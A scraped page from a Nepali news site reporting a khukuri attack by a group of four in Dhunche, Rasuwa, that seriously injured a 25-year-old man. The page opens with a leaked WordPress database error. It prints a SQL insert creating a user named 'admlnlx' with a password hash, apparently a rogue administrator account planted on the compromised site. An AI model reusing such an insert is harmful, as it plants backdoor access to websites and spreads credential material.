WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFbB2wDCNguU0Ak/OXbVK3SFL5hkJj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 00:49:57', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
चारजनाले अन्धाधुन्ध खुकुरी प्रहार, एकजना घाइते – Gaule Khabar

चारजनाले अन्धाधुन्ध खुकुरी प्रहार, एकजना घाइते

चारजनाले अन्धाधुन्ध खुकुरी प्रहार, एकजना घाइते

रसुवा, माघ २८ –

रसुवाको सदरमुकाम धुन्चेमा चारजनाको समूहमा आएकाले अन्धाधुन्ध खुकुरी प्रहार गर्दा थुमन–९ दाहालफेदीका २५ वर्षका बुद्धिबहादुर तामाङ गम्भीर घाइते भएका छन् ।

घाइतेको जिल्ला अस्पताल धुन्चेमा उपचार भैरहेको र थप उपचारका लागि काठमाडौं पठाउने तयारी भएको जिल्ला प्रहरी कार्यालय रसुवाले जनाएको छ ।

प्रहरी नायव उपरीक्षक फणिन्द्र प्रसाइँका अनुसार तामाङको टाउको र हातमा गम्भीर चोट लागेको छ । घटना शुक्रबार बिहान साढे ११ बजेतिर भएको हो ।

चार जनाको समूहमा खुकुरी लिएर आएकाले सडकबाट लखेटेपछि भाग्ने क्रममा निश्वास अन्डरग्राउण्ड क्याफेमा पसेपछि तामाङमाथि अन्धाधुन्ध खुकुरी प्रहार भएको प्रत्यक्षदर्शीले बताएका छन् । घटनामा संलग्न रहेकाहरुको अनुसन्धान तथा खोजी भैरहेको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका